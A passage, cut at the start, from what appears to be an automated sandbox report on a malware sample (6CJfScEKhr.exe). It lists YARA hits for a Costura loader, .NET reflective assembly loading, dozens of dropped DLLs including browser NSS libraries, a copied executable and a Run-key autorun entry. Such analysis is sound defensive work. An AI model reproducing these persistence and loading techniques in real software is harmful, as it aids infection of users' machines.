6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdbGCTL source: 6CJfScEKhr.exe, 0000000E.00000002.528193608.000000006ED61000.00000020.00000001.01000000.0000000D.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500081858.0000000003B38000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.485003516.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.484887053.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.491983533.0000000004784000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492450786.0000000004794000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492267505.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492145996.0000000004788000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492385843.0000000004790000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.439937420.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.439832449.0000000003E48000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496147713.0000000004828000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496294114.000000000482C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496387090.0000000004840000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.442753555.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492747934.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492875018.00000000047A8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493075719.00000000047AC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492747934.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492875018.00000000047A8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.468531219.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495535221.0000000004800000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495793950.000000000480C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.467718953.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495717285.0000000004808000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495638921.0000000004804000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.479365495.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.480618660.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.bb30000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.3999510.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.be90000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.3f39510.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.c4b0000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.be90000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.bb30000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.3999510.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.3f39510.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.3459510.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.3459510.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.c4b0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000015.00000002.524573757.000000000C4B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.407850693.000000000BE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.405740272.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.517932423.0000000002548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.518753284.000000000302A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.523563780.000000000BB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 6CJfScEKhr.exe PID: 3216, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Pthmzffh.exe PID: 4564, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Pthmzffh.exe PID: 5004, type: MEMORYSTR
              .NET source code contains potential unpacker
              Source: 6CJfScEKhr.exe, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: Pthmzffh.exe.0.dr, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 0.0.6CJfScEKhr.exe.4f0000.0.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 0.2.6CJfScEKhr.exe.4f0000.0.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 14.0.6CJfScEKhr.exe.850000.3.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 14.0.6CJfScEKhr.exe.850000.9.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 14.2.6CJfScEKhr.exe.850000.1.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 14.0.6CJfScEKhr.exe.850000.13.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 14.0.6CJfScEKhr.exe.850000.5.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 14.0.6CJfScEKhr.exe.850000.11.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 14.0.6CJfScEKhr.exe.850000.7.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 14.0.6CJfScEKhr.exe.850000.1.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 14.0.6CJfScEKhr.exe.850000.2.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 14.0.6CJfScEKhr.exe.850000.0.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 14.0.6CJfScEKhr.exe.850000.15.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 15.0.Pthmzffh.exe.170000.0.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 15.2.Pthmzffh.exe.170000.0.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 21.0.Pthmzffh.exe.c60000.0.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 21.2.Pthmzffh.exe.c60000.0.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_00992E20 push eax; retf 0_2_00992E21
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_00992859 push ebx; ret 0_2_0099287A
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_009927E7 push ebx; ret 0_2_0099287A
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_00D76645 push esp; ret 0_2_00D76669
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_00D76945 pushfd ; ret 0_2_00D76949
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_049D730E push eax; retf 0_2_049D7325
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_04A12390 push ss; ret 0_2_04A123A7
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040D86E push 0040D89Ch; ret 14_2_0040D894
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040D870 push 0040D89Ch; ret 14_2_0040D894
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_004140C0 push 004140ECh; ret 14_2_004140E4
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_004108C8 push 004108F4h; ret 14_2_004108EC
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040B0F7 push 0040B124h; ret 14_2_0040B11C
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040B0F8 push 0040B124h; ret 14_2_0040B11C
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00408080 push 004080B8h; ret 14_2_004080B0
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00408158 push 00408196h; ret 14_2_0040818E
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00408970 push 004089E4h; ret 14_2_004089DC
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00408994 push 004089E4h; ret 14_2_004089DC
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_004089AC push 004089E4h; ret 14_2_004089DC
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00415208 push 0041528Ch; ret 14_2_00415284
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040CA0C push 0040CA3Ch; ret 14_2_0040CA34
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040CA10 push 0040CA3Ch; ret 14_2_0040CA34
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00417AEC push 00417B18h; ret 14_2_00417B10
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00404BC0 push 00404C11h; ret 14_2_00404C09
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040D3C0 push 0040D3ECh; ret 14_2_0040D3E4
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040A3E4 push 0040A410h; ret 14_2_0040A408
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040C390 push 0040C3C0h; ret 14_2_0040C3B8
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040C394 push 0040C3C0h; ret 14_2_0040C3B8
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040A3AC push 0040A3D8h; ret 14_2_0040A3D0
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0041B3AE push cs; iretd 14_2_0041B3D9
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040DC44 push 0040DCA3h; ret 14_2_0040DC9B
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040DC0C push 0040DC38h; ret 14_2_0040DC30
              Source: msvcp140.dll.14.drStatic PE information: section name: .didat
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040B15C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,14_2_0040B15C
              Source: 6CJfScEKhr.exeStatic PE information: 0x99145F4B [Sun May 21 02:32:43 2051 UTC]
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\vcruntime140.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\msvcp140.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\nssdbm3.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\mozglue.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\ucrtbase.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PthmzffhJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PthmzffhJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_00417B1A
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
